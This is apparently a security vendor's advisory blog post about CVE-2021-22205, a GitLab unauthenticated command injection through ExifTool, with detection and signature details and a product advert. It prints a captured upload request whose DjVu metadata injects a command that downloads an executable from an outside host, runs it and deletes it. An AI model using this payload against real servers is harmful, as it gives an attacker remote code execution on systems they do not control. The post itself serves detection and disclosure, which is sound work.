GitLab Unauthenticated Remote ExifTool Command Injection

Darren Johns
Nov 11, 2021
1 min read

Updated: Jul 1, 2022

Application Details

GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.

Vulnerability

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Identification

Files that are uploaded with extensions of jpg, jpeg or tiff are passed to the ExifTool to remove any unauthorised tags. The issue is that the file extension will be ignored and the ExifTool will try to determine the type based on the content.

Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
	(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") )

Detection

By turning this vulnerability into a traffic file and matching rule, we are able to detect attempts to upload files which don't match the content type.

Coverage

Idappcom has created signature 8021990 along with a traffic file.

References

CVE-2021-22205

Hacker One Report

Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

1 Comment

cup cun

Jul 17

Curious about the technical details behind a photograph, like camera settings, shutter speed, or even GPS location if embedded? An EXIFReader tool online lets you upload an image and view this detailed EXIF (Exchangeable Image File Format) data to better understand your photos.